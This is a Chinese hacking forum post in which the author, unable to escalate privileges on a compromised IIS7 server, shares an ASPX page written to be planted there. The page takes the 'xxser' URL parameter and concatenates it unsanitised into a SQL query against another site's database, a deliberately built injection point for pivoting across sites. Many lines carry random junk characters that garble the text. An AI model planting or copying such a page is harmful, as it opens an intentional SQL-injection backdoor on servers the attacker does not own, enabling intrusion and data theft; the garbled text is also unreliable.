利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
3 b1 f% k6 s7 [, H其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
7 c* T: [& A: Y2 _8 ^# m6 j  D0 j% J代码量不多，自己写个拉倒了。烦死了。
5 ^* m: r: ?' h7 L# L
5 v4 ]- X2 Y2 d, H1 F! R6 n8 |4 i​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
" M* W: g) v. ]* X% I<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
, y& P! ]$ L* E1 }9 q# }    <title>暗影aspx构造注射专用页面</title>
8 @4 I( y0 j+ R/ `4 D: _% T+ D  X</head>
. Y& p% \8 {# A, l8 m<body>
$ g& l6 g% c+ c8 U# |0 \, `1 w    <form id="form1" runat="server">
    <div>
6 }' ], `/ N0 R/ u4 C4 N/ U     <script language="c#" runat="server">
: w& `5 w, o2 n            
( q1 w9 T* o# N' w% p         void page_init(object sender, EventArgs e)
         {
0 _% h1 Y2 K# v, T            
6 B: A& o0 K2 ?3 z; u: {             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
' U* C. B! c! W% u; L/ S2 b$ B  Q7 @            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
* I7 }" w% [2 \' h/ W; M             conn.Open();
- \* e# p& T! w& ?; r0 e0 S# X& J            
( j$ ^' S9 C/ W: t, @2 v3 l             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
9 w3 @/ ]: R/ o8 @4 x            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
; Y5 ~1 D: {* S, c             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
5 i6 X3 f  C& B6 C# [             Response.Write(x);
% P5 t) c0 U% f  l7 I1 P. L$ d. t             conn.Close();
$ P! m7 q0 `( ?         }
# P# z- V7 O" B  B6 t     
: T4 C3 M2 a4 Q' F' t  </script>
    </div>
    </form>
</body>
. T' t! m( G7 C  C& c  H) T</html>